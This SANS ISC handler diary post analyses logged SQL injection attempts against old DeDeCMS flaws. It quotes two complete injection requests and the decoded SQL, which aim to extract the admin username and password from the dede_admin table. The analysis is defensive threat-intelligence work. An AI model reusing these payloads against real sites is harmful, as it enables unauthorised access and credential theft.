Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Lazy Coordinated Attacks Against Old Vulnerabilities

Published: 2015-05-22
Last Updated: 2015-05-22 18:20:07 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS being conducted from what looks like several IP addresses at the same time, that appeared to share the load.

The attack:

GET /uploads/plus/search.php?keyword=11& typeArr[%60@%27%60and%28SELECT 1%20FROM%28select count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29 from dede_admin Limit 0,1%29%29a from information_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"

DeDeCMS is a Drupal like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any recognizance.

The attacker also doesn't bother modifying the user agent and keep the "Python-urllib/2.7" user agent indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some recognizance:

GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Here they spoof the Google user agent. The even first try out the "plus/search.php" URL:

GET //plus/search.php?keyword=as&typeArr[111%3D@`\x5C'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C'`+]=a HTTP/1.1" 404 9093 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack. 

 

[1] http://dedecms.com
[2] http://0day5.com/archives/341

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

Keywords:
0 comment(s)
Meet Johannes Ullrich at SANSFIRE!
ISC StormCast for Friday, May 22nd 2015 http://isc.sans.edu/podcastdetail.html?id=4495
Diary Archives